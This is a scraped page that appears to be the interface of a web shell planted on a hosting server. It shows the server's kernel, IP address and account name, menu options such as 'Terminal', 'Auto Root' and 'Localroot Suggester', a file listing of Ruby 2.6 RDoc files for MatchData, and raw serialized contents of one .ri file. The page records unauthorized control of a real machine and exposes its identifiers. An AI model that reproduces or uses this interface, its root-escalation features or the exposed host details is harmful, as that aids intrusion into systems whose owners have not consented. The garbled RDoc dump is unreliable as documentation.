Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
MatchData /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d-i.ri
406
B
-rw-r--r--
2023-07-26 18:33
%5b%5d-i.ri
1.28
KB
-rw-r--r--
2023-07-26 18:33
begin-i.ri
758
B
-rw-r--r--
2023-07-26 18:33
captures-i.ri
589
B
-rw-r--r--
2023-07-26 18:33
cdesc-MatchData.ri
3.1
KB
-rw-r--r--
2023-07-26 18:33
end-i.ri
786
B
-rw-r--r--
2023-07-26 18:33
eql%3f-i.ri
413
B
-rw-r--r--
2023-07-26 18:33
hash-i.ri
446
B
-rw-r--r--
2023-07-26 18:33
inspect-i.ri
793
B
-rw-r--r--
2023-07-26 18:33
length-i.ri
502
B
-rw-r--r--
2023-07-26 18:33
named_captures-i.ri
948
B
-rw-r--r--
2023-07-26 18:33
names-i.ri
692
B
-rw-r--r--
2023-07-26 18:33
offset-i.ri
784
B
-rw-r--r--
2023-07-26 18:33
post_match-i.ri
589
B
-rw-r--r--
2023-07-26 18:33
pre_match-i.ri
566
B
-rw-r--r--
2023-07-26 18:33
regexp-i.ri
434
B
-rw-r--r--
2023-07-26 18:33
size-i.ri
498
B
-rw-r--r--
2023-07-26 18:33
string-i.ri
502
B
-rw-r--r--
2023-07-26 18:33
to_a-i.ri
939
B
-rw-r--r--
2023-07-26 18:33
to_s-i.ri
458
B
-rw-r--r--
2023-07-26 18:33
values_at-i.ri
854
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI"named_captures:ETI"MatchData#named_captures;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"(Returns a Hash using named capture.;To:RDoc::Markup::BlankLine o; ; [I"8A key of the hash is a name of the named captures. ;TI"QA value of the hash is a string of last successful capture of corresponding ;TI"group.;T@o:RDoc::Markup::Verbatim; [I"&m = /(?<a>.)(?<b>.)/.match("01") ;TI"3m.named_captures #=> {"a" => "0", "b" => "1"} ;TI" ;TI"&m = /(?<a>.)(?<b>.)?/.match("0") ;TI"3m.named_captures #=> {"a" => "0", "b" => nil} ;TI" ;TI"&m = /(?<a>.)(?<a>.)/.match("01") ;TI"'m.named_captures #=> {"a" => "1"} ;TI" ;TI"&m = /(?<a>x)|(?<a>y)/.match("x") ;TI"&m.named_captures #=> {"a" => "x"};T:@format0: @fileI" re.c;T:0@omit_headings_from_table_of_contents_below0I"!mtch.named_captures -> hash ;T0[ I"();T@!FI"MatchData;TcRDoc::NormalClass00